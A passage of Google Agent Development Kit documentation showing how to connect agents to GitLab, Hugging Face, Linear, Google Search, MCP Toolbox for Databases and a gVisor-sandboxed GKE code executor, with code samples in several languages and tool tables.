Pipelines**: Diagnose build failures without leaving your chat. Inspect pipeline statuses and retrieve detailed job logs to pinpoint exactly why a specific merge request or commit failed its checks. ## Prerequisites - A GitLab account with a Premium or Ultimate subscription and [GitLab Duo](https://docs.gitlab.com/user/gitlab_duo/) enabled - [Beta and experimental features](https://docs.gitlab.com/user/gitlab_duo/turn_on_off/#turn-on-beta-and-experimental-features) enabled in your GitLab settings ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # Replace with your instance URL if self-hosted (e.g., "gitlab.example.com") GITLAB_INSTANCE_URL = "gitlab.com" root_agent = Agent( model="gemini-2.5-pro", name="gitlab_agent", instruction="Help users get information from GitLab", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command="npx", args=[ "-y", "mcp-remote", f"https://{GITLAB_INSTANCE_URL}/api/v4/mcp", "--static-oauth-client-metadata", "{\"scope\": \"mcp\"}", ], ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; // Replace with your instance URL if self-hosted (e.g., "gitlab.example.com") const GITLAB_INSTANCE_URL = "gitlab.com"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "gitlab_agent", instruction: "Help users get information from GitLab", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "mcp-remote", `https://${GITLAB_INSTANCE_URL}/api/v4/mcp`, "--static-oauth-client-metadata", '{"scope": "mcp"}', ], }, }), ], }); export { rootAgent }; ``` Note When you run this agent for the first time, a browser window will open automatically (and an authorization URL will be printed) requesting OAuth permissions. You must approve this request to allow the agent to access your GitLab data. ## Available tools | Tool | Description | | ----------------------------- | ------------------------------------------------------------------------- | | `get_mcp_server_version` | Returns the current version of the GitLab MCP server | | `create_issue` | Creates a new issue in a GitLab project | | `get_issue` | Retrieves detailed information about a specific GitLab issue | | `create_merge_request` | Creates a merge request in a project | | `get_merge_request` | Retrieves detailed information about a specific GitLab merge request | | `get_merge_request_commits` | Retrieves the list of commits in a specific merge request | | `get_merge_request_diffs` | Retrieves the diffs for a specific merge request | | `get_merge_request_pipelines` | Retrieves the pipelines for a specific merge request | | `get_pipeline_jobs` | Retrieves the jobs for a specific CI/CD pipeline | | `gitlab_search` | Searches for a term across the entire GitLab instance with the search API | | `semantic_code_search` | Searches for relevant code snippets in a project | ## Additional resources - [GitLab MCP Server Documentation](https://docs.gitlab.com/user/gitlab_duo/model_context_protocol/mcp_server/) # Google Cloud GKE Code Executor tool for ADK Supported in ADKPython v1.14.0 The GKE Code Executor (`GkeCodeExecutor`) provides a secure and scalable method for running LLM-generated code by leveraging the GKE (Google Kubernetes Engine) Sandbox environment, which uses gVisor for workload isolation. For each code execution request, it dynamically creates an ephemeral, sandboxed Kubernetes Job with a hardened Pod configuration. You should use this executor for production environments on GKE where security and isolation are critical. ## How it Works When a request to execute code is made, the `GkeCodeExecutor` performs the following steps: 1. **Creates a ConfigMap:** A Kubernetes ConfigMap is created to store the Python code that needs to be executed. 1. **Creates a Sandboxed Pod:** A new Kubernetes Job is created, which in turn creates a Pod with a hardened security context and the gVisor runtime enabled. The code from the ConfigMap is mounted into this Pod. 1. **Executes the Code:** The code is executed within the sandboxed Pod, isolated from the underlying node and other workloads. 1. **Retrieves the Result:** The standard output and error streams from the execution are captured from the Pod's logs. 1. **Cleans Up Resources:** Once the execution is complete, the Job and the associated ConfigMap are automatically deleted, ensuring that no artifacts are left behind. ## Key Benefits - **Enhanced Security:** Code is executed in a gVisor-sandboxed environment with kernel-level isolation. - **Ephemeral Environments:** Each code execution runs in its own ephemeral Pod, to prevent state transfer between executions. - **Resource Control:** You can configure CPU and memory limits for the execution Pods to prevent resource abuse. - **Scalability:** Allows you to run a large number of code executions in parallel, with GKE handling the scheduling and scaling of the underlying nodes. ## System requirements The following requirements must be met to successfully deploy your ADK project with the GKE Code Executor tool: - GKE cluster with a **gVisor-enabled node pool**. - Agent's service account requires specific **RBAC permissions**, which allow it to: - Create, watch, and delete **Jobs** for each execution request. - Manage **ConfigMaps** to inject code into the Job's pod. - List **Pods** and read their **logs** to retrieve the execution result - Install the client library with GKE extras: `pip install google-adk[gke]` For a complete, ready-to-use configuration, see the [deployment_rbac.yaml](https://github.com/google/adk-python/blob/main/contributing/samples/gke_agent_sandbox/deployment_rbac.yaml) sample. For more information on deploying ADK workflows to GKE, see [Deploy to Google Kubernetes Engine (GKE)](/adk-docs/deploy/gke/). ```python from google.adk.agents import LlmAgent from google.adk.code_executors import GkeCodeExecutor # Initialize the executor, targeting the namespace where its ServiceAccount # has the required RBAC permissions. # This example also sets a custom timeout and resource limits. gke_executor = GkeCodeExecutor( namespace="agent-sandbox", timeout_seconds=600, cpu_limit="1000m", # 1 CPU core mem_limit="1Gi", ) # The agent now uses this executor for any code it generates. gke_agent = LlmAgent( name="gke_coding_agent", model="gemini-2.0-flash", instruction="You are a helpful AI agent that writes and executes Python code.", code_executor=gke_executor, ) ``` ## Configuration parameters The `GkeCodeExecutor` can be configured with the following parameters: | Parameter | Type | Description | | -------------------- | ----- | --------------------------------------------------------------------------------------------------------------------- | | `namespace` | `str` | Kubernetes namespace where the execution Jobs will be created. Defaults to `"default"`. | | `image` | `str` | Container image to use for the execution Pod. Defaults to `"python:3.11-slim"`. | | `timeout_seconds` | `int` | Timeout in seconds for the code execution. Defaults to `300`. | | `cpu_requested` | `str` | Amount of CPU to request for the execution Pod. Defaults to `"200m"`. | | `mem_requested` | `str` | Amount of memory to request for the execution Pod. Defaults to `"256Mi"`. | | `cpu_limit` | `str` | Maximum amount of CPU the execution Pod can use. Defaults to `"500m"`. | | `mem_limit` | `str` | Maximum amount of memory the execution Pod can use. Defaults to `"512Mi"`. | | `kubeconfig_path` | `str` | Path to a kubeconfig file to use for authentication. Falls back to in-cluster config or the default local kubeconfig. | | `kubeconfig_context` | `str` | The `kubeconfig` context to use. | # Gemini API Google Search tool for ADK Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.2.0 The `google_search` tool allows the agent to perform web searches using Google Search. The `google_search` tool is only compatible with Gemini 2 models. For further details of the tool, see [Understanding Google Search grounding](/adk-docs/grounding/google_search_grounding/). Additional requirements when using the `google_search` tool When you use grounding with Google Search, and you receive Search suggestions in your response, you must display the Search suggestions in production and in your applications. For more information on grounding with Google Search, see Grounding with Google Search documentation for [Google AI Studio](https://ai.google.dev/gemini-api/docs/grounding/search-suggestions) or [Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/grounding/grounding-search-suggestions). The UI code (HTML) is returned in the Gemini response as `renderedContent`, and you will need to show the HTML in your app, in accordance with the policy. Warning: Single tool per agent limitation This tool can only be used ***by itself*** within an agent instance. For more information about this limitation and workarounds, see [Limitations for ADK tools](/adk-docs/tools/limitations/#one-tool-one-agent). ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools import google_search from google.genai import types APP_NAME="google_search_agent" USER_ID="user1234" SESSION_ID="1234" root_agent = Agent( name="basic_search_agent", model="gemini-2.0-flash", description="Agent to answer questions using Google Search.", instruction="I can answer your questions by searching the internet. Just ask me anything!", # google_search is a pre-built tool which allows the agent to perform Google searches. tools=[google_search] ) # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=root_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("what's the latest ai news?") ``` ```typescript import {GOOGLE_SEARCH, LlmAgent} from '@google/adk'; export const rootAgent = new LlmAgent({ model: 'gemini-2.5-flash', name: 'root_agent', description: 'an agent whose job it is to perform Google search queries and answer questions about the results.', instruction: 'You are an agent whose job is to perform Google search queries and answer questions about the results.', tools: [GOOGLE_SEARCH], }); ``` ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package main import ( "context" "fmt" "log" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/geminitool" "google.golang.org/genai" ) func createSearchAgent(ctx context.Context) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, fmt.Errorf("failed to create model: %v", err) } return llmagent.New(llmagent.Config{ Name: "basic_search_agent", Model: model, Description: "Agent to answer questions using Google Search.", Instruction: "I can answer your questions by searching the web. Just ask me anything!", Tools: []tool.Tool{geminitool.GoogleSearch{}}, }) } const ( userID = "user1234" appName = "Google Search_agent" ) func callAgent(ctx context.Context, a agent.Agent, prompt string) error { sessionService := session.InMemoryService() session, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, }) if err != nil { return fmt.Errorf("failed to create the session service: %v", err) } config := runner.Config{ AppName: appName, Agent: a, SessionService: sessionService, } r, err := runner.New(config) if err != nil { return fmt.Errorf("failed to create the runner: %v", err) } sessionID := session.Session.ID() userMsg := &genai.Content{ Parts: []*genai.Part{{Text: prompt}}, Role: string(genai.RoleUser), } // The r.Run method streams events and errors. // The loop iterates over the results, handling them as they arrive. for event, err := range r.Run(ctx, userID, sessionID, userMsg, agent.RunConfig{ StreamingMode: agent.StreamingModeSSE, }) { if err != nil { fmt.Printf("\nAGENT_ERROR: %v\n", err) } else if event.Partial { for _, p := range event.LLMResponse.Content.Parts { fmt.Print(p.Text) } } } return nil } func main() { agent, err := createSearchAgent(context.Background()) if err != nil { log.Fatalf("Failed to create agent: %v", err) } fmt.Println("Agent created:", agent.Name()) prompt := "what's the latest ai news?" fmt.Printf("\nPrompt: %s\nResponse: ", prompt) if err := callAgent(context.Background(), agent, prompt); err != nil { log.Fatalf("Error calling agent: %v", err) } fmt.Println("\n---") } ``` ```java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.GoogleSearchTool; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; public class GoogleSearchAgentApp { private static final String APP_NAME = "Google Search_agent"; private static final String USER_ID = "user1234"; private static final String SESSION_ID = "1234"; /** * Calls the agent with the given query and prints the final response. * * @param runner The runner to use. * @param query The query to send to the agent. */ public static void callAgent(Runner runner, String query) { Content content = Content.fromParts(Part.fromText(query)); InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService(); Session session = sessionService .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID) .blockingGet(); runner .runAsync(session.userId(), session.id(), content) .forEach( event -> { if (event.finalResponse() && event.content().isPresent() && event.content().get().parts().isPresent() && !event.content().get().parts().get().isEmpty() && event.content().get().parts().get().get(0).text().isPresent()) { String finalResponse = event.content().get().parts().get().get(0).text().get(); System.out.println("Agent Response: " + finalResponse); } }); } public static void main(String[] args) { // Google Search is a pre-built tool which allows the agent to perform Google searches. GoogleSearchTool googleSearchTool = new GoogleSearchTool(); BaseAgent rootAgent = LlmAgent.builder() .name("basic_search_agent") .model("gemini-2.0-flash") // Ensure to use a Gemini 2.0 model for Google Search Tool .description("Agent to answer questions using Google Search.") .instruction( "I can answer your questions by searching the internet. Just ask me anything!") .tools(ImmutableList.of(googleSearchTool)) .build(); // Session and Runner InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(rootAgent, APP_NAME, null, sessionService); // Agent Interaction callAgent(runner, "what's the latest ai news?"); } } ``` # Hugging Face MCP tool for ADK Supported in ADKPythonTypeScript The [Hugging Face MCP Server](https://github.com/huggingface/hf-mcp-server) can be used to connect your ADK agent to the Hugging Face Hub and thousands of Gradio AI Applications. ## Use cases - **Discover AI/ML Assets**: Search and filter the Hub for models, datasets, and papers based on tasks, libraries, or keywords. - **Build Multi-Step Workflows**: Chain tools together, such as transcribing audio with one tool and then summarizing the resulting text with another. - **Find AI Applications**: Search for Gradio Spaces that can perform a specific task, like background removal or text-to-speech. ## Prerequisites - Create a [user access token](https://huggingface.co/settings/tokens) in Hugging Face. Refer to the [documentation](https://huggingface.co/docs/hub/en/security-tokens) for more information. ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters HUGGING_FACE_TOKEN = "YOUR_HUGGING_FACE_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="hugging_face_agent", instruction="Help users get information from Hugging Face", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command="npx", args=[ "-y", "@llmindset/hf-mcp-server", ], env={ "HF_TOKEN": HUGGING_FACE_TOKEN, } ), timeout=30, ), ) ], ) ``` ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams HUGGING_FACE_TOKEN = "YOUR_HUGGING_FACE_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="hugging_face_agent", instruction="Help users get information from Hugging Face", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url="https://huggingface.co/mcp", headers={ "Authorization": f"Bearer {HUGGING_FACE_TOKEN}", }, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const HUGGING_FACE_TOKEN = "YOUR_HUGGING_FACE_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "hugging_face_agent", instruction: "Help users get information from Hugging Face", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: ["-y", "@llmindset/hf-mcp-server"], env: { HF_TOKEN: HUGGING_FACE_TOKEN, }, }, }), ], }); export { rootAgent }; ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const HUGGING_FACE_TOKEN = "YOUR_HUGGING_FACE_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "hugging_face_agent", instruction: "Help users get information from Hugging Face", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: "https://huggingface.co/mcp", header: { Authorization: `Bearer ${HUGGING_FACE_TOKEN}`, }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | ----------------------------- | ---------------------------------------------------------- | | Spaces Semantic Search | Find the best AI Apps via natural language queries | | Papers Semantic Search | Find ML Research Papers via natural language queries | | Model Search | Search for ML models with filters for task, library, etc… | | Dataset Search | Search for datasets with filters for author, tags, etc… | | Documentation Semantic Search | Search the Hugging Face documentation library | | Hub Repository Details | Get detailed information about Models, Datasets and Spaces | ## Configuration To configure which tools are available in your Hugging Face Hub MCP server, visit the [MCP Settings Page](https://huggingface.co/settings/mcp) in your Hugging Face account. To configure the local MCP server, you can use the following environment variables: - `TRANSPORT`: The transport type to use (`stdio`, `sse`, `streamableHttp`, or `streamableHttpJson`) - `DEFAULT_HF_TOKEN`: ⚠️ Requests are serviced with the `HF_TOKEN` received in the Authorization: Bearer header. The DEFAULT_HF_TOKEN is used if no header was sent. Only set this in Development / Test environments or for local STDIO Deployments. ⚠️ - If running with stdio transport, `HF_TOKEN` is used if `DEFAULT_HF_TOKEN` is not set. - `HF_API_TIMEOUT`: Timeout for Hugging Face API requests in milliseconds (default: 12500ms / 12.5 seconds) - `USER_CONFIG_API`: URL to use for User settings (defaults to Local front-end) - `MCP_STRICT_COMPLIANCE`: set to True for GET 405 rejects in JSON Mode (default serves a welcome page). - `AUTHENTICATE_TOOL`: whether to include an Authenticate tool to issue an OAuth challenge when called - `SEARCH_ENABLES_FETCH`: When set to true, automatically enables the hf_doc_fetch tool whenever hf_doc_search is enabled ## Additional resources - [Hugging Face MCP Server Repository](https://github.com/huggingface/hf-mcp-server) - [Hugging Face MCP Server Documentation](https://huggingface.co/docs/hub/en/hf-mcp-server) # Linear MCP tool for ADK Supported in ADKPythonTypeScript The [Linear MCP Server](https://linear.app/docs/mcp) connects your ADK agent to [Linear](https://linear.app/), a purpose-built tool for planning and building products. This integration gives your agent the ability to manage issues, track project cycles, and automate development workflows using natural language. ## Use cases - **Streamline Issue Management**: Create, update, and organize issues using natural language. Let your agent handle logging bugs, assigning tasks, and updating statuses. - **Track Projects and Cycles**: Get instant visibility into your team's momentum. Query the status of active cycles, check project milestones, and retrieve deadlines. - **Contextual Search & Summarization**: Quickly catch up on long discussion threads or find specific project specifications. Your agent can search documentation and summarize complex issues. ## Prerequisites - [Sign up](https://linear.app/signup) for a Linear account - Generate an API key in [Linear Settings > Security & access](https://linear.app/docs/security-and-access) (if using API authentication) ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters root_agent = Agent( model="gemini-2.5-pro", name="linear_agent", instruction="Help users manage issues, projects, and cycles in Linear", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "mcp-remote", "https://mcp.linear.app/mcp", ] ), timeout=30, ), ) ], ) ``` Note When you run this agent for the first time, a browser window will open automatically to request access via OAuth. Alternatively, you can use the authorization URL printed in the console. You must approve this request to allow the agent to access your Linear data. ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams LINEAR_API_KEY = "YOUR_LINEAR_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="linear_agent", instruction="Help users manage issues, projects, and cycles in Linear", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url="https://mcp.linear.app/mcp", headers={ "Authorization": f"Bearer {LINEAR_API_KEY}", }, ), ) ], ) ``` Note This code example uses an API key for authentication. To use a browser-based OAuth authentication flow instead, remove the `headers` parameter and run the agent. ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "linear_agent", instruction: "Help users manage issues, projects, and cycles in Linear", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: ["-y", "mcp-remote", "https://mcp.linear.app/mcp"], }, }), ], }); export { rootAgent }; ``` Note When you run this agent for the first time, a browser window will open automatically to request access via OAuth. Alternatively, you can use the authorization URL printed in the console. You must approve this request to allow the agent to access your Linear data. ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const LINEAR_API_KEY = "YOUR_LINEAR_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "linear_agent", instruction: "Help users manage issues, projects, and cycles in Linear", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: "https://mcp.linear.app/mcp", header: { Authorization: `Bearer ${LINEAR_API_KEY}`, }, }), ], }); export { rootAgent }; ``` Note This code example uses an API key for authentication. To use a browser-based OAuth authentication flow instead, remove the `header` property and run the agent. ## Available tools | Tool | Description | | ---------------------- | ---------------------------- | | `list_comments` | List comments on an issue | | `create_comment` | Create a comment on an issue | | `list_cycles` | List cycles in a project | | `get_document` | Get a document | | `list_documents` | List documents | | `get_issue` | Get an issue | | `list_issues` | List issues | | `create_issue` | Create an issue | | `update_issue` | Update an issue | | `list_issue_statuses` | List issue statuses | | `get_issue_status` | Get an issue status | | `list_issue_labels` | List issue labels | | `create_issue_label` | Create an issue label | | `list_projects` | List projects | | `get_project` | Get a project | | `create_project` | Create a project | | `update_project` | Update a project | | `list_project_labels` | List project labels | | `list_teams` | List teams | | `get_team` | Get a team | | `list_users` | List users | | `get_user` | Get a user | | `search_documentation` | Search documentation | ## Additional resources - [Linear MCP Server Documentation](https://linear.app/docs/mcp) - [Linear Getting Started Guide](https://linear.app/docs/start-guide) # MCP Toolbox for Databases tool for ADK Supported in ADKPythonTypescriptGo [MCP Toolbox for Databases](https://github.com/googleapis/genai-toolbox) is an open source MCP server for databases. It was designed with enterprise-grade and production-quality in mind. It enables you to develop tools easier, faster, and more securely by handling the complexities such as connection pooling, authentication, and more. Google’s Agent Development Kit (ADK) has built in support for MCP Toolbox. For more information on [getting started](https://googleapis.github.io/genai-toolbox/getting-started/) or [configuring](https://googleapis.github.io/genai-toolbox/getting-started/configure/) MCP Toolbox, see the [documentation](https://googleapis.github.io/genai-toolbox/getting-started/introduction/). ## Supported Data Sources MCP Toolbox provides out-of-the-box toolsets for the following databases and data platforms: ### Google Cloud - [BigQuery](https://googleapis.github.io/genai-toolbox/resources/sources/bigquery/) (including tools for SQL execution, schema discovery, and AI-powered time series forecasting) - [AlloyDB](https://googleapis.github.io/genai-toolbox/resources/sources/alloydb-pg/) (PostgreSQL-compatible, with tools for both standard queries and natural language queries) - [AlloyDB Admin](https://googleapis.github.io/genai-toolbox/resources/sources/alloydb-admin/) - [Spanner](https://googleapis.github.io/genai-toolbox/resources/sources/spanner/) (supporting both GoogleSQL and PostgreSQL dialects) - Cloud SQL (with dedicated support for [Cloud SQL for PostgreSQL](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-sql-pg/), [Cloud SQL for MySQL](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-sql-mysql/), and [Cloud SQL for SQL Server](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-sql-mssql/)) - [Cloud SQL Admin](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-sql-admin/) - [Firestore](https://googleapis.github.io/genai-toolbox/resources/sources/firestore/) - [Bigtable](https://googleapis.github.io/genai-toolbox/resources/sources/bigtable/) - [Dataplex](https://googleapis.github.io/genai-toolbox/resources/sources/dataplex/) (for data discovery and metadata search) - [Cloud Monitoring](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-monitoring/) ### Relational & SQL Databases - [PostgreSQL](https://googleapis.github.io/genai-toolbox/resources/sources/postgres/) (generic) - [MySQL](https://googleapis.github.io/genai-toolbox/resources/sources/mysql/) (generic) - [Microsoft SQL Server](https://googleapis.github.io/genai-toolbox/resources/sources/mssql/) (generic) - [ClickHouse](https://googleapis.github.io/genai-toolbox/resources/sources/clickhouse/) - [TiDB](https://googleapis.github.io/genai-toolbox/resources/sources/tidb/) - [OceanBase](https://googleapis.github.io/genai-toolbox/resources/sources/oceanbase/) - [Firebird](https://googleapis.github.io/genai-toolbox/resources/sources/firebird/) - [SQLite](https://googleapis.github.io/genai-toolbox/resources/sources/sqlite/) - [YugabyteDB](https://googleapis.github.io/genai-toolbox/resources/sources/yugabytedb/) ### NoSQL & Key-Value Stores - [MongoDB](https://googleapis.github.io/genai-toolbox/resources/sources/mongodb/) - [Couchbase](https://googleapis.github.io/genai-toolbox/resources/sources/couchbase/) - [Redis](https://googleapis.github.io/genai-toolbox/resources/sources/redis/) - [Valkey](https://googleapis.github.io/genai-toolbox/resources/sources/valkey/) - [Cassandra](https://googleapis.github.io/genai-toolbox/resources/sources/cassandra/) ### Graph Databases - [Neo4j](https://googleapis.github.io/genai-toolbox/resources/sources/neo4j/) (with tools for Cypher queries and schema inspection) - [Dgraph](https://googleapis.github.io/genai-toolbox/resources/sources/dgraph/) ### Data Platforms & Federation - [Looker](https://googleapis.github.io/genai-toolbox/resources/sources/looker/) (for running Looks, queries, and building dashboards via the Looker API) - [Trino](https://googleapis.github.io/genai-toolbox/resources/sources/trino/) (for running federated queries across multiple sources) ### Other - [HTTP](https://googleapis.github.io/genai-toolbox/resources/sources/http/) ## Configure and deploy MCP Toolbox is an open source server that you deploy and manage yourself. For more instructions on deploying and configuring, see the official Toolbox documentation: - [Installing the Server](https://googleapis.github.io/genai-toolbox/getting-started/introduction/#installing-the-server) - [Configuring MCP Toolbox](https://googleapis.github.io/genai-toolbox/getting-started/configure/) ## Install Client SDK for ADK ADK relies on the `toolbox-adk` python package to use MCP Toolbox. Install the package before getting started: ```shell pip install google-adk[toolbox] ``` ### Loading MCP Toolbox Tools Once your MCP Toolbox server is configured, up and running, you can load tools from your server using ADK: ```python from google.adk import Agent from google.adk.tools.toolbox_toolset import ToolboxToolset toolset = ToolboxToolset( server_url="http://127.0.0.1:5000" ) root_agent = Agent( ..., tools=[toolset] # Provide the toolset to the Agent ) ``` ### Authentication The `ToolboxToolset` supports various authentication strategies including Workload Identity (ADC), User Identity (OAuth2), and API Keys. For full documentation, see the [MCP Toolbox ADK Authentication Guide](https://github.com/googleapis/mcp-toolbox-sdk-python/tree/main/packages/toolbox-adk#authentication). **Example: Workload Identity (ADC)** Recommended for Cloud Run, GKE, or local development with `gcloud auth login`. ```python from google.adk.tools.toolbox_toolset import ToolboxToolset from toolbox_adk import CredentialStrategy # target_audience: The URL of your MCP Toolbox server creds = CredentialStrategy.workload_identity(target_audience="") toolset = ToolboxToolset( server_url="", credentials=creds ) ``` ### Advanced Configuration You can configure parameter binding and additional headers. See the [MCP Toolbox ADK documentation](https://github.com/googleapis/mcp-toolbox-sdk-python/tree/main/packages/toolbox-adk) for details. For example, you can bind values to tool parameters. Note These values are hidden from the model. ```python toolset = ToolboxToolset( server_url="...", bound_params={ "region": "us-central1", "api_key": lambda: get_api_key() # Can be a callable } ) ``` ADK relies on the `@toolbox-sdk/adk` TS package to use MCP Toolbox. Install the package before getting started: ```shell npm install @toolbox-sdk/adk ``` ### Loading MCP Toolbox Tools Once your MCP Toolbox server is configured and up and running, you can load tools from your server using ADK: ```typescript import {InMemoryRunner, LlmAgent} from '@google/adk'; import {Content} from '@google/genai'; import {ToolboxClient} from '@toolbox-sdk/adk' const toolboxClient = new ToolboxClient("http://127.0.0.1:5000"); const loadedTools = await toolboxClient.loadToolset(); export const rootAgent = new LlmAgent({ name: 'weather_time_agent', model: 'gemini-2.5-flash', description: 'Agent to answer questions about the time and weather in a city.', instruction: 'You are a helpful agent who can answer user questions about the time and weather in a city.', tools: loadedTools, }); async function main() { const userId = 'test_user'; const appName = rootAgent.name; const runner = new InMemoryRunner({agent: rootAgent, appName}); const session = await runner.sessionService.createSession({ appName, userId, }); const prompt = 'What is the weather in New York? And the time?'; const content: Content = { role: 'user', parts: [{text: prompt}], }; console.log(content); for await (const e of runner.runAsync({ userId, sessionId: session.id, newMessage: content, })) { if (e.content?.parts?.[0]?.text) { console.log(`${e.author}: ${JSON.stringify(e.content, null, 2)}`); } } } main().catch(console.error); ``` ADK relies on the `mcp-toolbox-sdk-go` go module to use MCP Toolbox. Install the module before getting started: ```shell go get github.com/googleapis/mcp-toolbox-sdk-go ``` ### Loading MCP Toolbox Tools Once your MCP Toolbox server is configured and up and running, you can load tools from your server using ADK: ```go package main import ( "context" "fmt" "github.com/googleapis/mcp-toolbox-sdk-go/tbadk" "google.golang.org/adk/agent/llmagent" ) func main() { toolboxClient, err := tbadk.NewToolboxClient("https://127.0.0.1:5000") if err != nil { log.Fatalf("Failed to create MCP Toolbox client: %v", err) } // Load a specific set of tools toolboxtools, err := toolboxClient.LoadToolset("my-toolset-name", ctx) if err != nil { return fmt.Sprintln("Could not load MCP Toolbox Toolset", err) } toolsList := make([]tool.Tool, len(toolboxtools)) for i := range toolboxtools { toolsList[i] = &toolboxtools[i] } llmagent, err := llmagent.New(llmagent.Config{ ..., Tools: toolsList, }) // Load a single tool tool, err := client.LoadTool("my-tool-name", ctx) if err != nil { return fmt.Sprintln("Could not load MCP Toolbox Tool", err) } llmagent, err := llmagent.New(llmagent.Config{ ..., Tools: []tool.Tool{&toolboxtool}, }) } ``` ## Advanced MCP Toolbox Features MCP Toolbox has a variety of features to make developing Gen AI tools for databases. For more information, read more about the following features: - [Authenticated Parameters](https://googleapis.github.io/genai-toolbox/resources/tools/#authenticated-parameters): bind tool inputs to values from OIDC tokens automatically, making it easy to run sensitive queries without potentially leaking data - [Authorized Invocations:](https://googleapis.github.io/genai-toolbox/resources/tools/#authorized-invocations) restrict access to use a tool based on the users Auth token - [OpenTelemetry](https://googleapis.github.io/genai-toolbox/how-to/export_telemetry/): get metrics and tracing from Toolbox with OpenTelemetry # MLflow observability for ADK Supported in ADKPython [MLflow Tracing](https://mlflow.org/docs/latest/genai/tracing/) provides first-class support for ingesting OpenTelemetry (OTel) traces. Google ADK emits OTel spans for agent runs, tool calls, and model requests, which you can send directly to an MLflow Tracking Server for analysis and debugging. ## Prerequisites - MLflow version 3.6.0 or newer. OpenTelemetry ingestion is only supported in MLflow 3.6.0+. - A SQL-based backend store (e.g., SQLite, PostgreSQL, MySQL). File-based stores do not support OTLP ingestion. - Google ADK installed in your environment. ## Install dependencies ```bash pip install "mlflow>=3.6.0" google-adk opentelemetry-sdk opentelemetry-exporter-otlp-proto-http ``` ## Start the MLflow Tracking Server Start MLflow with a SQL backend and a 